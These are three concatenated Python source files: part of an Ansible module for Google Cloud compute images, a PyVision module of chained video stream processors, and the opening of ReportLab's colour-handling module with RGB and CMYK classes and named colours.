u'sourceDiskEncryptionKey': ImageSourcediskencryptionkey(module.params.get('source_disk_encryption_key', {}), module).to_request(),
u'sourceDiskId': module.params.get('source_disk_id'),
u'sourceType': module.params.get('source_type'),
}
return_vals = {}
for k, v in request.items():
if v or v is False:
return_vals[k] = v
return return_vals
def fetch_resource(module, link, kind, allow_not_found=True):
auth = GcpSession(module, 'compute')
return return_if_object(module, auth.get(link), kind, allow_not_found)
def self_link(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/global/images/{name}".format(**module.params)
def collection(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/global/images".format(**module.params)
def return_if_object(module, response, kind, allow_not_found=False):
# If not found, return nothing.
if allow_not_found and response.status_code == 404:
return None
# If no content, return nothing.
if response.status_code == 204:
return None
try:
module.raise_for_status(response)
result = response.json()
except getattr(json.decoder, 'JSONDecodeError', ValueError):
module.fail_json(msg="Invalid JSON response with error: %s" % response.text)
if navigate_hash(result, ['error', 'errors']):
module.fail_json(msg=navigate_hash(result, ['error', 'errors']))
return result
def is_different(module, response):
request = resource_to_request(module)
response = response_to_hash(module, response)
# Remove all output-only from response.
response_vals = {}
for k, v in response.items():
if k in request:
response_vals[k] = v
request_vals = {}
for k, v in request.items():
if k in response:
request_vals[k] = v
return GcpRequest(request_vals) != GcpRequest(response_vals)
# Remove unnecessary properties from the response.
# This is for doing comparisons with Ansible's current parameters.
def response_to_hash(module, response):
return {
u'archiveSizeBytes': response.get(u'archiveSizeBytes'),
u'creationTimestamp': response.get(u'creationTimestamp'),
u'deprecated': ImageDeprecated(response.get(u'deprecated', {}), module).from_response(),
u'description': response.get(u'description'),
u'diskSizeGb': response.get(u'diskSizeGb'),
u'family': response.get(u'family'),
u'guestOsFeatures': ImageGuestosfeaturesArray(response.get(u'guestOsFeatures', []), module).from_response(),
u'id': response.get(u'id'),
u'imageEncryptionKey': ImageImageencryptionkey(response.get(u'imageEncryptionKey', {}), module).from_response(),
u'labels': response.get(u'labels'),
u'labelFingerprint': response.get(u'labelFingerprint'),
u'licenses': response.get(u'licenses'),
u'name': response.get(u'name'),
u'rawDisk': ImageRawdisk(response.get(u'rawDisk', {}), module).from_response(),
u'sourceDisk': response.get(u'sourceDisk'),
u'sourceDiskEncryptionKey': ImageSourcediskencryptionkey(response.get(u'sourceDiskEncryptionKey', {}), module).from_response(),
u'sourceDiskId': response.get(u'sourceDiskId'),
u'sourceType': response.get(u'sourceType'),
}
def license_selflink(name, params):
if name is None:
return
url = r"https://www.googleapis.com/compute/v1//projects/.*/global/licenses/.*"
if not re.match(url, name):
name = "https://www.googleapis.com/compute/v1//projects/{project}/global/licenses/%s".format(**params) % name
return name
def async_op_url(module, extra_data=None):
if extra_data is None:
extra_data = {}
url = "https://www.googleapis.com/compute/v1/projects/{project}/global/operations/{op_id}"
combined = extra_data.copy()
combined.update(module.params)
return url.format(**combined)
def wait_for_operation(module, response):
op_result = return_if_object(module, response, 'compute#operation')
if op_result is None:
return {}
status = navigate_hash(op_result, ['status'])
wait_done = wait_for_completion(status, op_result, module)
return fetch_resource(module, navigate_hash(wait_done, ['targetLink']), 'compute#image')
def wait_for_completion(status, op_result, module):
op_id = navigate_hash(op_result, ['name'])
op_uri = async_op_url(module, {'op_id': op_id})
while status != 'DONE':
raise_if_errors(op_result, ['error', 'errors'], module)
time.sleep(1.0)
op_result = fetch_resource(module, op_uri, 'compute#operation', False)
status = navigate_hash(op_result, ['status'])
return op_result
def raise_if_errors(response, err_path, module):
errors = navigate_hash(response, err_path)
if errors is not None:
module.fail_json(msg=errors)
class ImageDeprecated(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{
u'deleted': self.request.get('deleted'),
u'deprecated': self.request.get('deprecated'),
u'obsolete': self.request.get('obsolete'),
u'replacement': self.request.get('replacement'),
u'state': self.request.get('state'),
}
)
def from_response(self):
return remove_nones_from_dict(
{
u'deleted': self.request.get(u'deleted'),
u'deprecated': self.request.get(u'deprecated'),
u'obsolete': self.request.get(u'obsolete'),
u'replacement': self.request.get(u'replacement'),
u'state': self.request.get(u'state'),
}
)
class ImageGuestosfeaturesArray(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = []
def to_request(self):
items = []
for item in self.request:
items.append(self._request_for_item(item))
return items
def from_response(self):
items = []
for item in self.request:
items.append(self._response_from_item(item))
return items
def _request_for_item(self, item):
return remove_nones_from_dict({u'type': item.get('type')})
def _response_from_item(self, item):
return remove_nones_from_dict({u'type': item.get(u'type')})
class ImageImageencryptionkey(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict({u'rawKey': self.request.get('raw_key')})
def from_response(self):
return remove_nones_from_dict({u'rawKey': self.request.get(u'rawKey')})
class ImageRawdisk(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{u'containerType': self.request.get('container_type'), u'sha1Checksum': self.request.get('sha1_checksum'), u'source': self.request.get('source')}
)
def from_response(self):
return remove_nones_from_dict(
{u'containerType': self.request.get(u'containerType'), u'sha1Checksum': self.request.get(u'sha1Checksum'), u'source': self.request.get(u'source')}
)
class ImageSourcediskencryptionkey(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict({u'rawKey': self.request.get('raw_key')})
def from_response(self):
return remove_nones_from_dict({u'rawKey': self.request.get(u'rawKey')})
if __name__ == '__main__':
main()
|
|
'''
Created on Mar 18, 2011
@author: svohara
'''
# PyVision License
#
# Copyright (c) 2006-2008 Stephen O'Hara
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither name of copyright holders nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import pyvision as pv
import cv2.cv as cv
'''
This module implements various Video Stream Processors, or VSPs for short.
A VSP is designed to encapsulate a per-frame operation that can be
applied to a video stream. Examples include displaying the image while
overlaying the frame number (SimpleVSP), writing the output of a video
stream to a video file (VideoWriterVSP), and performing motion detection
on each video frame (MotionDetectionVSP).
The general idea is to chain together a VSP sequence, and then attach
the head of the chain to a video's play method. We hope that users will
create and/or contribute many useful subclasses of AbstractVSP.
For example:
import pyvision as pv
vsp_write = pv.VideoWriterVSP('tmp.avi',size=(640,480))
vsp_disp = pv.SimpleVSP(window="Display", nextModule=vsp_write)
vid = pv.Video(sourceFile)
vid.play(window=None, delay=25, onNewFrame=vsp_disp)
'''
VSP_SWALLOW_IMG = -1 #special return onNewFrame to indicate that the frame should be skipped, and not passed downstream
class AbstractVSP():
'''AbstractVSP is the abstract class definition of a
Video Stream Processor (VSP) object. VSP's are designed to be chained
together to accomplish processing on a video stream.
'''
def __init__(self, window=None, nextModule=None):
''' Constructor
@param window: The window name to use when displaying this VSP's
output. Specify None to suppress showing the output, but note that
if you modify the current image with annotations, those will be
persisted "downstream" to later processors.
@param nextModule: A Video Stream Processor object that should be
invoked on every frame after this processor has finished.
'''
self._windowName = window
self._nextModule = nextModule
def __call__(self, img, fn, **kwargs):
rc = self._onNewFrame(img, fn, **kwargs)
if type(rc) == list or type(rc) == tuple:
#then we should have (newImg, newFn)
(newImg, fn) = rc #we overwrite the fn parameter that downstream modules will see
else:
#rc should be just newImg to pass on to next Module
newImg = rc
if newImg == VSP_SWALLOW_IMG:
#special return indicates that the nextModule should
# not be called at this iteration...the current input image
# should be swallowed with no output
pass
else:
if self._nextModule != None:
if newImg != None:
#we have a new image to replace the current one instream
kwargs['orig_img']=img #add a new keyword arg to allow access to origininal img
self._nextModule(newImg, fn, **kwargs)
else:
self._nextModule(img, fn, **kwargs)
def _onNewFrame(self, img, fn, **kwargs):
''' Override this abstract method with the processing your object
performs on a per-frame basis. It is recommended that you do not
directly call this method. Rather, the VSP is a callable object,
and so the __call__ method takes care of invoking this method as
well as calling the next module, if any.
'''
raise NotImplemented
class FrameNumberVSP(AbstractVSP):
'''A simple VSP object simply displays the input video frame with
some simple annotation to show the frame number in upper left corner.
NOTE: The vid.play(...) method will automatically add a frame number
annotation to the source image, which can be problematic for downstream
processing. Instead, call vid.play(...,annotate=False) to suppress
the frame number display, and then use this FrameNumberVSP as a final
step to put the frame number on the video after any processing has
occurred.
'''
def __init__(self, display_pad=4, window=None, nextModule=None):
'''
Constructor
@param display_pad: Pads the frame number with leading zeros
in order to have at least this many digits.
'''
self.pad = display_pad
AbstractVSP.__init__(self, window, nextModule)
def _onNewFrame(self, img, fn, **kwargs):
pt = pv.Point(10, 10)
img.annotateLabel(label="Frame: %s"%str(fn+1).zfill(self.pad), point=pt, color="white", background="black")
if self._windowName != None: img.show(window=self._windowName, delay=1)
return img
#TODO: There seems to be a bug in the video writing output when writing
# frames from some source video objects in some output sizes. The symptom
# appears as an output video that is "slanted" and grainy.
class VideoWriterVSP(AbstractVSP):
'''
A video stream processor that outputs to a new movie file.
If you want to display the frame number in the output, chain this VSP
after a SimpleVSP object in the series.
'''
def __init__(self, filename, window="Input", nextModule=None, fourCC_str="XVID", fps=15, size=None, bw=False,
no_annotations = False):
'''
Constructor
@param filename: The full output filename. Include the extension, such as .avi.
@param window: The window name to use when displaying this VSP's
output. Specify None to suppress showing the output, but note that
if you modify the current image with annotations, those will be
persisted "downstream" to later processors.
@param nextModule: A Video Stream Processor object that should be
invoked on every frame after this processor has finished.
@param fourCC_str: The "Four CC" string that is used to specify the encoder.
@param fps: Frames per second. Not all codecs allow you to specify arbitrary frame rates, however.
@param size: A tuple (w,h) representing the size of the output frames.
@param bw: Specify true if you wish for a black-and-white only output.
@param no_annotations: set to True to output the original, non-annotated version of the image
'''
cvFourCC = cv.CV_FOURCC(*fourCC_str)
if bw:
colorFlag = cv.CV_LOAD_IMAGE_GRAYSCALE
else:
colorFlag = cv.CV_LOAD_IMAGE_UNCHANGED
self._bw = bw
self._out = cv.CreateVideoWriter(filename, cvFourCC, fps, size, colorFlag)
self._no_annotations = no_annotations
AbstractVSP.__init__(self, window=window, nextModule=nextModule)
def addFrame(self, img):
'''
@param img: A pyvision img to write out to the video.
'''
if self._no_annotations:
img2 = img
else:
img2 = pv.Image(img.asAnnotated())
if self._bw:
cv.WriteFrame(self._out, img2.asOpenCVBW())
else:
cv.WriteFrame(self._out, img2.asOpenCV())
def _onNewFrame(self, img, fn, **kwargs):
self.addFrame(img)
return img
class ResizerVSP(AbstractVSP):
'''This VSP resizes each frame of video. Subsequent VSPs in a chain
will see the resized image instead of the original.
'''
def __init__(self, new_size=(320,240), window="Resized Image", nextModule=None):
self._newSize = new_size
AbstractVSP.__init__(self, window=window, nextModule=nextModule)
def _onNewFrame(self, img, fn, **kwargs):
img = img.resize(self._newSize)
if self._windowName != None: img.show(window=self._windowName, delay=1)
return img
class FrameSkipperVSP(AbstractVSP):
'''
This is a video stream processor that is used to skip every k frames
in a source video. You might put this vsp as the first step in processing
if you need to adjust a 60fps video, for example, to skip every other frame
so that downstream processing sees 30fps input.
Downstream modules will see a renumbered video stream. For example, if every-other
frame was being skipped, the nextModule would still see its frame number input as 0,1,2,3,...
even though in reality it is receiving frames 0,2,4,... from the source video.
'''
def __init__(self, skip_param=0, nextModule=None):
'''
Constructor
@param skip_param: If 0, then no frames are skipped. Otherwise a frame
is skipped if (frame_number + 1) modulo skip_param == 0. For example, with
skip_param of 2, then frames 1,3,5,7,... will be dropped.
'''
self.skip_param = skip_param
if skip_param == 1:
print "Warning, you specified a skip_param of 1 for the frame skipper VSP."
print "This means ALL frames will be suppressed."
pv.AbstractVSP.__init__(self, window=None, nextModule=nextModule)
def _onNewFrame(self, img, fn, **kwargs):
if self.skip_param == 0:
#special case, do nothing
return img
if ( (fn+1) % self.skip_param ) == 0:
return VSP_SWALLOW_IMG
else:
newFn = int( round( (1 - (1.0/self.skip_param))*fn) )
return (img, newFn) #let this one through, provide new frame number
class MotionDetectionVSP(AbstractVSP):
''' This VSP uses an existing motion detection object to apply motion
detection to each frame of video.
'''
def __init__(self, md_object, window="Motion Detection", nextModule=None):
''' Constructor
@param md_object: The pyvision motion detection object to be used by
this VSP
@param window: The name of the output window. Use None to suppress output.
@param nextModule: The next VSP, if any, to be called by this VSP.
'''
self._md = md_object
AbstractVSP.__init__(self, window=window, nextModule=nextModule)
def _onNewFrame(self, img, fn, **kwargs):
''' Performs motion detection using this object's md object,
displays the foreground pixels to a window.
'''
md = self._md
rc = md.detect(img)
if rc > -1:
md.annotateFrame(img, rect_color="yellow", contour_color=None, flow_color=None)
if self._windowName != None: img.show(window=self._windowName, delay=1)
#img_fg = md.getForegroundPixels()
#img_fg.show("Foreground")
return img
class PeopleDetectionVSP(AbstractVSP):
''' This Video Stream Processor applies the OpenCV HOG people detector
to each frame of video, annotating the detections with red rectangles.
'''
def _onNewFrame(self, img, fn, **kwargs):
rects = self._detectPeople(img)
for r in rects: img.annotateRect(r)
if self._windowName != None: img.show(window=self._windowName, delay=1)
return img
def _detectPeople(self, img):
cvim = img.asOpenCV() #convert to OpenCV format before using OpenCV functions
rect_list = []
try:
found = list(cv.HOGDetectMultiScale(cvim, cv.CreateMemStorage(0)))
rect_list = [ pv.Rect(x,y,w,h) for ((x,y),(w,h)) in found] #python list comprehension
except:
#cv.HOGDetectMultiScale can throw exceptions, so return empty list
return []
return rect_list
|
|
#Copyright ReportLab Europe Ltd. 2000-2010
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/lib/colors.py
__version__=''' $Id: colors.py 3780 2010-09-17 13:40:59Z rgbecker $ '''
__doc__='''Defines standard colour-handling classes and colour names.
We define standard classes to hold colours in two models: RGB and CMYK.
These can be constructed from several popular formats. We also include
- pre-built colour objects for the HTML standard colours
- pre-built colours used in ReportLab's branding
- various conversion and construction functions
'''
import math
from reportlab.lib.utils import fp_str
class Color:
"""This class is used to represent color. Components red, green, blue
are in the range 0 (dark) to 1 (full intensity)."""
def __init__(self, red=0, green=0, blue=0, alpha=1):
"Initialize with red, green, blue in range [0-1]."
self.red = red
self.green = green
self.blue = blue
self.alpha = alpha
def __repr__(self):
return "Color(%s)" % fp_str(*(self.red, self.green, self.blue,self.alpha)).replace(' ',',')
def __hash__(self):
return hash((self.red, self.green, self.blue, self.alpha))
def __cmp__(self,other):
'''simple comparison by component; cmyk != color ever
>>> cmp(Color(0,0,0),None)
-1
>>> cmp(Color(0,0,0),black)
0
>>> cmp(Color(0,0,0),CMYKColor(0,0,0,1)),Color(0,0,0).rgba()==CMYKColor(0,0,0,1).rgba()
(-1, True)
'''
if isinstance(other,CMYKColor) or not isinstance(other,Color): return -1
try:
return cmp((self.red, self.green, self.blue, self.alpha),
(other.red, other.green, other.blue, other.alpha))
except:
return -1
return 0
def rgb(self):
"Returns a three-tuple of components"
return (self.red, self.green, self.blue)
def rgba(self):
"Returns a four-tuple of components"
return (self.red, self.green, self.blue, self.alpha)
def bitmap_rgb(self):
return tuple(map(lambda x: int(x*255)&255, self.rgb()))
def bitmap_rgba(self):
return tuple(map(lambda x: int(x*255)&255, self.rgba()))
def hexval(self):
return '0x%02x%02x%02x' % self.bitmap_rgb()
def hexvala(self):
return '0x%02x%02x%02x%02x' % self.bitmap_rgba()
_cKwds='red green blue alpha'.split()
def cKwds(self):
for k in self._cKwds:
yield k,getattr(self,k)
cKwds=property(cKwds)
def clone(self,**kwds):
'''copy then change values in kwds'''
D = dict([kv for kv in self.cKwds])
D.update(kwds)
return self.__class__(**D)
def _lookupName(self,D={}):
if not D:
for n,v in getAllNamedColors().iteritems():
if not isinstance(v,CMYKColor):
t = v.red,v.green,v.blue
if t in D:
n = n+'/'+D[t]
D[t] = n
t = self.red,self.green,self.blue
return t in D and D[t] or None
class CMYKColor(Color):
"""This represents colors using the CMYK (cyan, magenta, yellow, black)
model commonly used in professional printing. This is implemented
as a derived class so that renderers which only know about RGB "see it"
as an RGB color through its 'red','green' and 'blue' attributes, according
to an approximate function.
The RGB approximation is worked out when the object in constructed, so
the color attributes should not be changed afterwards.
Extra attributes may be attached to the class to support specific ink models,
and renderers may look for these."""
_scale = 1.0
def __init__(self, cyan=0, magenta=0, yellow=0, black=0,
spotName=None, density=1, knockout=None, alpha=1):
"""
Initialize with four colors in range [0-1]. the optional
spotName, density & knockout may be of use to specific renderers.
spotName is intended for use as an identifier to the renderer not client programs.
density is used to modify the overall amount of ink.
knockout is a renderer dependent option that determines whether the applied colour
knocksout (removes) existing colour; None means use the global default.
"""
self.cyan = cyan
self.magenta = magenta
self.yellow = yellow
self.black = black
self.spotName = spotName
self.density = max(min(density,1),0) # force into right range
self.knockout = knockout
self.alpha = alpha
# now work out the RGB approximation. override
self.red, self.green, self.blue = cmyk2rgb( (cyan, magenta, yellow, black) )
if density<1:
#density adjustment of rgb approximants, effectively mix with white
r, g, b = self.red, self.green, self.blue
r = density*(r-1)+1
g = density*(g-1)+1
b = density*(b-1)+1
self.red, self.green, self.blue = (r,g,b)
def __repr__(self):
return "%s(%s%s%s%s%s)" % (self.__class__.__name__,
fp_str(self.cyan, self.magenta, self.yellow, self.black).replace(' ',','),
(self.spotName and (',spotName='+repr(self.spotName)) or ''),
(self.density!=1 and (',density='+fp_str(self.density)) or ''),
(self.knockout is not None and (',knockout=%d' % self.knockout) or ''),
(self.alpha is not None and (',alpha=%s' % self.alpha) or ''),
)
def fader(self, n, reverse=False):
'''return n colors based on density fade
*NB* note this dosen't reach density zero'''
scale = self._scale
dd = scale/float(n)
L = [self.clone(density=scale - i*dd) for i in xrange(n)]
if reverse: L.reverse()
return L
def __hash__(self):
return hash( (self.cyan, self.magenta, self.yellow, self.black, self.density, self.spotName, self.alpha) )
def __cmp__(self,other):
"""obvious way to compare colours
Comparing across the two color models is of limited use.
>>> cmp(CMYKColor(0,0,0,1),None)
-1
>>> cmp(CMYKColor(0,0,0,1),_CMYK_black)
0
>>> cmp(PCMYKColor(0,0,0,100),_CMYK_black)
0
>>> cmp(CMYKColor(0,0,0,1),Color(0,0,1)),Color(0,0,0).rgba()==CMYKColor(0,0,0,1).rgba()
(-1, True)
"""
if not isinstance(other, CMYKColor): return -1
try:
return cmp(
(self.cyan, self.magenta, self.yellow, self.black, self.density, self.alpha, self.spotName),
(other.cyan, other.magenta, other.yellow, other.black, other.density, other.alpha, other.spotName))
except: # or just return 'not equal' if not a color
return -1
return 0
def cmyk(self):
"Returns a tuple of four color components - syntactic sugar"
return (self.cyan, self.magenta, self.yellow, self.black)
def cmyka(self):
"Returns a tuple of five color components - syntactic sugar"
return (self.cyan, self.magenta, self.yellow, self.black, self.alpha)
def _density_str(self):
return fp_str(self.density)
_cKwds='cyan magenta yellow black density alpha spotName knockout'.split()
def _lookupName(self,D={}):
if not D:
for n,v in getAllNamedColors().iteritems():
if isinstance(v,CMYKColor):
t = v.cyan,v.magenta,v.yellow,v.black
if t in D:
n = n+'/'+D[t]
D[t] = n
t = self.cyan,self.magenta,self.yellow,self.black
return t in D and D[t] or None
class PCMYKColor(CMYKColor):
'''100 based CMYKColor with density and a spotName; just like Rimas uses'''
_scale = 100.
def __init__(self,cyan,magenta,yellow,black,density=100,spotName=None,knockout=None,alpha=100):
CMYKColor.__init__(self,cyan/100.,magenta/100.,yellow/100.,black/100.,spotName,density/100.,knockout=knockout,alpha=alpha/100.)
def __repr__(self):
return "%s(%s%s%s%s%s)" % (self.__class__.__name__,
fp_str(self.cyan*100, self.magenta*100, self.yellow*100, self.black*100).replace(' ',','),
(self.spotName and (',spotName='+repr(self.spotName)) or ''),
(self.density!=1 and (',density='+fp_str(self.density*100)) or ''),
(self.knockout is not None and (',knockout=%d' % self.knockout) or ''),
(self.alpha is not None and (',alpha=%s' % (fp_str(self.alpha*100))) or ''),
)
def cKwds(self):
K=self._cKwds
S=K[:6]
for k in self._cKwds:
v=getattr(self,k)
if k in S: v*=100
yield k,v
cKwds=property(cKwds)
class CMYKColorSep(CMYKColor):
'''special case color for making separating pdfs'''
_scale = 1.
def __init__(self, cyan=0, magenta=0, yellow=0, black=0,
spotName=None, density=1,alpha=1):
CMYKColor.__init__(self,cyan,magenta,yellow,black,spotName,density,knockout=None,alpha=alpha)
_cKwds='cyan magenta yellow black density alpha spotName'.split()
class PCMYKColorSep(PCMYKColor,CMYKColorSep):
'''special case color for making separating pdfs'''
_scale = 100.
def __init__(self, cyan=0, magenta=0, yellow=0, black=0,
spotName=None, density=100, alpha=100):
PCMYKColor.__init__(self,cyan,magenta,yellow,black,density,spotName,knockout=None,alpha=alpha)
_cKwds='cyan magenta yellow black density alpha spotName'.split()
def cmyk2rgb(cmyk,density=1):
"Convert from a CMYK color tuple to an RGB color tuple"
c,m,y,k = cmyk
# From the Adobe Postscript Ref. Manual 2nd ed.
r = 1.0 - min(1.0, c + k)
g = 1.0 - min(1.0, m + k)
b = 1.0 - min(1.0, y + k)
return (r,g,b)
def rgb2cmyk(r,g,b):
'''one way to get cmyk from rgb'''
c = 1 - r
m = 1 - g
y = 1 - b
k = min(c,m,y)
c = min(1,max(0,c-k))
m = min(1,max(0,m-k))
y = min(1,max(0,y-k))
k = min(1,max(0,k))
return (c,m,y,k)
def color2bw(colorRGB):
"Transform an RGB color to a black and white equivalent."
col = colorRGB
r, g, b, a = col.red, col.green, col.blue, col.alpha
n = (r + g + b) / 3.0
bwColorRGB = Color(n, n, n, a)
return bwColorRGB
def HexColor(val, htmlOnly=False, alpha=False):
"""This function converts a hex string, or an actual integer number,
into the corresponding color. E.g., in "#AABBCC" or 0xAABBCC,
AA is the red, BB is the green, and CC is the blue (00-FF).
An alpha value can also be given in the form #AABBCCDD or 0xAABBCCDD where
DD is the alpha value.
For completeness I assume that #aabbcc or 0xaabbcc are hex numbers
otherwise a pure integer is converted as decimal rgb. If htmlOnly is true,
only the #aabbcc form is allowed.
>>> HexColor('#ffffff')
Color(1,1,1,1)
>>> HexColor('#FFFFFF')
Color(1,1,1,1)
>>> HexColor('0xffffff')
Color(1,1,1,1)
>>> HexColor('16777215')
Color(1,1,1,1)
An '0x' or '#' prefix is required for hex (as opposed to decimal):
>>> HexColor('ffffff')
Traceback (most recent call last):
ValueError: invalid literal for int() with base 10: 'ffffff'
>>> HexColor('#FFFFFF', htmlOnly=True)
Color(1,1,1,1)
>>> HexColor('0xffffff', htmlOnly=True)
Traceback (most recent call last):
ValueError: not a hex string
>>> HexColor('16777215', htmlOnly=True)
Traceback (most recent call last):
ValueError: not a hex string
""" #" for emacs
if isinstance(val,basestring):
b = 10
if val[:1] == '#':
val = val[1:]
b = 16
if len(val) == 8:
alpha = True
else:
if htmlOnly:
raise ValueError('not a hex string')
if val[:2].lower() == '0x':
b = 16
val = val[2:]
if len(val) == 8:
alpha = True
val = int(val,b)
if alpha:
return Color((val>>24)&0xFF/255.0,((val>>16)&0xFF)/255.0,((val>>8)&0xFF)/255.0,(val&0xFF)/255.0)
return Color(((val>>16)&0xFF)/255.0,((val>>8)&0xFF)/255.0,(val&0xFF)/255.0)
def linearlyInterpolatedColor(c0, c1, x0, x1, x):
"""
Linearly interpolates colors. Can handle RGB, CMYK and PCMYK
colors - give ValueError if colours aren't the same.
Doesn't currently handle 'Spot Color Interpolation'.
"""
if c0.__class__ != c1.__class__:
raise ValueError("Color classes must be the same for interpolation!\nGot %r and %r'"%(c0,c1))
if x1<x0:
x0,x1,c0,c1 = x1,x0,c1,c0 # normalized so x1>x0
if x<x0-1e-8 or x>x1+1e-8: # fudge factor for numerical problems
raise ValueError, "Can't interpolate: x=%f is not between %f and %f!" % (x,x0,x1)
if x<=x0:
return c0
elif x>=x1:
return c1
cname = c0.__class__.__name__
dx = float(x1-x0)
x = x-x0
if cname == 'Color': # RGB
r = c0.red+x*(c1.red - c0.red)/dx
g = c0.green+x*(c1.green- c0.green)/dx
b = c0.blue+x*(c1.blue - c0.blue)/dx
a = c0.alpha+x*(c1.alpha - c0.alpha)/dx
return Color(r,g,b,alpha=a)
elif cname == 'CMYKColor':
if cmykDistance(c0,c1)<1e-8:
#colors same do density and preserve spotName if any
assert c0.spotName == c1.spotName, "Identical cmyk, but different spotName"
c = c0.cyan
m = c0.magenta
y = c0.yellow
k = c0.black
d = c0.density+x*(c1.density - c0.density)/dx
a = c0.alpha+x*(c1.alpha - c0.alpha)/dx
return CMYKColor(c,m,y,k, density=d, spotName=c0.spotName, alpha=a)
elif cmykDistance(c0,_CMYK_white)<1e-8:
#special c0 is white
c = c1.cyan
m = c1.magenta
y = c1.yellow
k = c1.black
d = x*c1.density/dx
a = x*c1.alpha/dx
return CMYKColor(c,m,y,k, density=d, spotName=c1.spotName, alpha=a)
elif cmykDistance(c1,_CMYK_white)<1e-8:
#special c1 is white
c = c0.cyan
m = c0.magenta
y = c0.yellow
k = c0.black
d = x*c0.density/dx
d = c0.density*(1-x/dx)
a = c0.alpha*(1-x/dx)
return PCMYKColor(c,m,y,k, density=d, spotName=c0.spotName, alpha=a)
else:
c = c0.cyan+x*(c1.cyan - c0.cyan)/dx
m = c0.magenta+x*(c1.magenta - c0.magenta)/dx
y = c0.yellow+x*(c1.yellow - c0.yellow)/dx
k = c0.black+x*(c1.black - c0.black)/dx
d = c0.density+x*(c1.density - c0.density)/dx
a = c0.alpha+x*(c1.alpha - c0.alpha)/dx
return CMYKColor(c,m,y,k, density=d, alpha=a)
elif cname == 'PCMYKColor':
if cmykDistance(c0,c1)<1e-8:
#colors same do density and preserve spotName if any
assert c0.spotName == c1.spotName, "Identical cmyk, but different spotName"
c = c0.cyan
m = c0.magenta
y = c0.yellow
k = c0.black
d = c0.density+x*(c1.density - c0.density)/dx
a = c0.alpha+x*(c1.alpha - c0.alpha)/dx
return PCMYKColor(c*100,m*100,y*100,k*100, density=d*100,
spotName=c0.spotName, alpha=100*a)
elif cmykDistance(c0,_CMYK_white)<1e-8:
#special c0 is white
c = c1.cyan
m = c1.magenta
y = c1.yellow
k = c1.black
d = x*c1.density/dx
a = x*c1.alpha/dx
return PCMYKColor(c*100,m*100,y*100,k*100, density=d*100,
spotName=c1.spotName, alpha=a*100)
elif cmykDistance(c1,_CMYK_white)<1e-8:
#special c1 is white
c = c0.cyan
m = c0.magenta
y = c0.yellow
k = c0.black
d = x*c0.density/dx
d = c0.density*(1-x/dx)
a = c0.alpha*(1-x/dx)
return PCMYKColor(c*100,m*100,y*100,k*100, density=d*100,
spotName=c0.spotName, alpha=a*100)
else:
c = c0.cyan+x*(c1.cyan - c0.cyan)/dx
m = c0.magenta+x*(c1.magenta - c0.magenta)/dx
y = c0.yellow+x*(c1.yellow - c0.yellow)/dx
k = c0.black+x*(c1.black - c0.black)/dx
d = c0.density+x*(c1.density - c0.density)/dx
a = c0.alpha+x*(c1.alpha - c0.alpha)/dx
return PCMYKColor(c*100,m*100,y*100,k*100, density=d*100, alpha=a*100)
else:
raise ValueError, "Can't interpolate: Unknown color class %s!" % cname
def obj_R_G_B(c):
'''attempt to convert an object to (red,green,blue)'''
if isinstance(c,Color):
return c.red,c.green,c.blue
elif isinstance(c,(tuple,list)):
if len(c)==3:
return tuple(c)
elif len(c)==4:
return toColor(c).rgb()
else:
raise ValueError('obj_R_G_B(%r) bad argument' % (c))
# special case -- indicates no drawing should be done
# this is a hangover from PIDDLE - suggest we ditch it since it is not used anywhere
transparent = Color(0,0,0,alpha=0)
_CMYK_white=CMYKColor(0,0,0,0)
_PCMYK_white=PCMYKColor(0,0,0,0)
_CMYK_black=CMYKColor(0,0,0,1)
_PCMYK_black=PCMYKColor(0,0,0,100)
# Special colors
ReportLabBlueOLD = HexColor(0x4e5688)
ReportLabBlue = HexColor(0x00337f)
ReportLabBluePCMYK = PCMYKColor(100,65,0,30,spotName='Pantone 288U')
ReportLabLightBlue = HexColor(0xb7b9d3)
ReportLabFidBlue=HexColor(0x3366cc)
ReportLabFidRed=HexColor(0xcc0033)
ReportLabGreen = HexColor(0x336600)
ReportLabLightGreen = HexColor(0x339933)
# color constants -- mostly from HTML standard
aliceblue = HexColor(0xF0F8FF)
antiquewhite = HexColor(0xFAEBD7)
aqua = HexColor(0x00FFFF)
aquamarine = HexColor(0x7FFFD4)
azure = HexColor(0xF0FFFF)
beige = HexColor(0xF5F5DC)
bisque = HexColor(0xFFE4C4)
black = HexColor(0x000000)
blanchedalmond = HexColor(0xFFEBCD)
blue = HexColor(0x0000FF)
blueviolet = HexColor(0x8A2BE2)
